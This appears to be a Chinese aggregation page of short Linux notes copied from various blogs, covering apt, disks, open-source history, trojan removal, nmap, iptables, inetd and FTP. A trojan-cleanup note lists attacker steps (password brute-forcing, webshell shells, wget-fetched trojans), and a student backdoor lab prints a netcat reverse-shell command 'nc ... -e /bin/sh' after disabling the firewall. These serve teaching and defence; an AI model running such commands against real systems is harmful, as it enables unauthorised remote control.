linux系统

二、更新 1. sudo apt-get update 更新 /etc/apt/sources.list 和 /etc/apt/sources.list.d 中列出的源的地址,这样才能获取到最新的软件包 2. sudo apt-get upgrade 升级已安装的所有软件包，升级的版本就是更新的源地址里的版本，因此，在执行 upgrade 之前一定要执行 update, 这样才能更新到最新的 来源： 51CTO 作者： 山药当人参 链接： https://blog.51cto.com/14156081/2449106

首先执行 fdisk -l 最底下 Device Start End Sectors Size Type /dev/vda1 2048 6143 4096 2M BIOS boot /dev/vda2 6144 104857566 104851423 50G EFI System 然后df指令: Filesystem 1K-blocks Used Available Use% Mounted on udev 487880 0 487880 0% /dev tmpfs 101612 10936 90676 11% /run /dev/vda2 51471976 5861852 43287236 12% / tmpfs 508044 0 508044 0% /dev/shm tmpfs 5120 0 5120 0% /run/lock tmpfs 508044 0 508044 0% /sys/fs/cgroup tmpfs 101612 0 101612 0% /run/user/0 udev:外设硬件设备映射目录 tmpfs ;临时目录 vda1表示:虚拟磁盘A分区1 类推 sda是实硬盘 来源： https://www.cnblogs.com/DragonStart/p/7128619.html

一、开源软件的定义：开源软件就是将软件程序和源代码文件一起打包提供给用户使用。 二、开源软件依靠提供服务生存发展。 三、开源软件的好处: 1.低风险 2.低成本 3.高品质 4.更透明 四、Linux遵循GNU GPL协议：只要软件中包含遵循GPL协议的产品或代码，那么该软件就必须也遵循GPL协议且开源、免费。这种协议不太适合商用。 五、GNU GPL的六个自由： 1.使用自由 2.复制自由 3.传播自由 4.修改自由 5.创建衍生品自由 6.收费自由 六、Linux发展历史 1.1970年：UNIX系统开源免费 2.1979年：AT&T公司对UNIX计划商业化 3.1984年：Richard Stallman 发起GNU源代码开放计划并制定GPL协议 4.1987年：GNU计划获得突破--gcc编译器发布 5.1991年：Linus Torvalds 编写了一款名为Linux的操作系统 6.1994年：Bob Young 在Linux系统内核的基础上集成源代码和软件程序，发布了红帽系统 七、RedHat旗下系统：CentOS Febora 八、Linux与Windows系统相比所具有的优势： 1.稳定且效率高 2.免费 3.出现漏洞可以快速得到修复 4.多任务多用户 5.占用资源少 6.可以小内核程序嵌入系统 来源： 51CTO 作者： fantasy7728 链接： https

一、上传木马的过程 1、默认端口22弱口令暴力破解； 2、21端口或者3306端口弱口令暴力破解； 3、webshell进行shell反弹提权； 4、木马传入服务器的上面并且执行，通过木马的方式来控制你的服务器进行非法的操作。 二、常见操作 1、切入/tmp； 2、wget下载木马； 3、木马加载权限； 4、执行木马； 5、后门，支持木马复活。 三、清除木马 1、网络连接，过滤掉正常连接； # netstat -nalp | grep "tcp" | grep -v "22" | grep "ESTABLISHED" 2、判断一些异常连接，通过PID找到进程名称； # ps -ef | grep "27368" 3、通过名字，找到原文件，删除掉原文件。 四、清除后门 1、检查/etc/rc.local； 2、检查计划任务crontab -l； 3、检查/root/.bashrc和普通用户下的.bashrc； 4、检查/etc/profile文件定期进行md5校验。 五、安全加固 1、了解常见的扫描和提权端口 -22 端口暴力破解 -21端口提权 -3306 端口提权 -webshell 反弹 2、如何对linux进行安全加固 2.1进程数量监控及对比 2.1.1、进程数量 2.1.2、进程异常的名称及PID号 2.1.3、根据PID号进行查询网络连接异常 写一个脚本:

假设在 192.168.10.* 有一台网络打印机，但是我们不知道它的地址。一种笨方法就是在浏览器中依次输入 192.168.10.1 到 192.168.10.254，看是否出现管理页面。 另一种思路是用命令扫描。网络打印机的默认端口号是9100,只需找到打开了此端口的主机即可。 首先确保有namp工具，没有请安装。 然后输入以下命令: nmap -p 9100 --open 192.168.10.1/24 输出类似于： Nmap scan report for 192.168.10.xxx Host is up ... PORT STATE SERVICE 9100/tcp open jetdirect 那么 192.168.10.xxx 可能就是打印机了 来源： https://www.cnblogs.com/Suzzz/p/4910320.html

Linux关闭防火墙 1） 永久性生效，重启后不会复原 开启：chkconfig iptables on 关闭：chkconfig iptables off 2） 即时生效，重启后复原 开启：service iptables start 关闭：service iptables stop 3)在开启了防火墙时，做如下设置，开启相关端口， 修改/etc/sysconfig/iptables 文件，添加以下内容： -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT 来源： https://www.cnblogs.com/welcomer/p/5068296.html

20175133 于沛辰 Exp2 后门原理与实践 0.基础知识 0.1 后门概念 　　后门就是不经过正常认证流程而访问系统的通道。 0.2 哪里有后门？ 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 　　 狭义定义： 特指潜伏于操作系统中专门做后门的一个程序，“坏人”可以连接这个程序 远程执行各种指令。 概念和木马有重叠 0.3 常用后门工具：netcat 又名nc,ncat 是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用 1.实验内容 1.1 Win获得Linux Shell 以下实践Windows基本Win7-64bit, Kali 2020-64bit. ·打开Windows监听 在虚拟机win7上调出命令指示符输入指令 ipconfig 查看地址 打开监听，输入指令 ncat.exe -l -p 5133 ·Linux反弹连接win 先输入指令 apt- get install ufw 安装，然后再输入指令 ufw disable 关闭kali防火墙 在kali的终端输入命令 nc 192.168 . 199.136 5133 -e /bin/sh windows下获得一个linux shell，可运行任何指令，如ls ·Linux获得Win Shell

原文： http://blog.chinaunix.net/uid-21411227-id-1826876.html ---------------------------------------------------------------------------------------- 1 ．引言： 它可以为多种服务管理连接,当 inetd 接到连接时，它能够确定连接所需的程序，启动相应的进程，并把 socket 交给它 (服务 socket 会作为程序的标准输入、 输出和错误输出描述符)。 使用inetd 来运行那些负载不重的服务有助于降低系统负载，因为它不需要为每个服务都启动独立的服务程序。 　　一般说来， inetd 主要用于启动其它服务程序，但它也有能力直接处理某些简单的服务， 例如chargen、 auth， 以及 daytime。 inetd 是通过rc系统启动的。 inetd_enable 选项默认设为 NO，但可以在安装系统时， 由用户根据需要通过 sysinstall 来打开。 inetd.conf则是inetd的配置文件。 inetd.conf文件告诉inetd监听哪些网络端口，为每个端口启动哪个服务。在任何的网络环境中使用 Linux 系统，第一件要做的事就是了解一下服务器到底要提供哪些服务。不需要的那些服务应该被禁止掉，最好卸载掉

转自： https://www.cnblogs.com/mingforyou/p/4103022.html 一、 ftp 的 get 命令 和mget 命令 有何不同？ get 一次只下载一个文件；mget一次可以下载多个文件，而且支持通配符，需要注意的是在mget的时侯，需要对每一个文件都选择y/n，如果想不交互的下载全部的文件，可以先用prompt 命令 关掉交互方式（关闭：prompt off；打开：prompt on）。 二、 FTP 使用什么 命令 来定位服务器与本地硬盘的路径？ ftp 中用lcd切换本地路径，用cd切换远程服务器的路径。常用到的 命令 如下： cd目录名（进入服务器目录） lcd目录名（进入本机目录） cd \（退到服务器根目录） lcd \（退到本机根目录） cd ..（退回到上一级目录） lcd ..（退回到上一级目录） 三、! 命令 有何作用？ 执行本地shell 命令 ，如:!dir（显示本机当亲目录内容），如果不加！如：dir（显示服务器当前目录内容） 四、 ftp 命令 支持“含有空格”的文件夹/文件名吗？ 支持，只要在引用时加上双引号“”即可！ 五、下面是 命令 行方式使用 FTP 的实战练习 假设有一 ftp 服务器： ftp .test.com ，用户名：username，密码：user1234。在本地电脑D：盘创建一个文件夹

Linux Desktop Software Referral 本文用于推荐一些Linux桌面环境常用的工具，以Deb系为基础，备忘 Deb Installer Gdebi 使用gdebi安装.deb安装包，仅用于Ubuntu/Debian及衍生发行版 Package Manager Aptitude dpkg (Deb系自带) synaptic （新立得软件包管理） 使用源安装软件，某种程度上减少使用直接使用Apt，提供更优的依赖解决方案，仅用于Ubuntu/Debian及衍生发行版 Desktop Mate KDE Gnome Cinnamon Xfce Budgie LXDE/LXQT 以上都是桌面，详情看评测自己去试，本人比较中意Budgie——一款从FreeBsd移植过来的基于Gnome的桌面 Browsers Firefox Google Chrome Pdf Readers Okular Evince Foxit Reader WPS E-Book Viewer E-Book Editor Okular是KDE环境下的PDF阅读器，个人觉得是Linux平台目前最好的 Develop Utils Idea Eclipse Spring Suit Tools Postman Visual Studio Code 开发测试工具很多，基本都会有Linux版本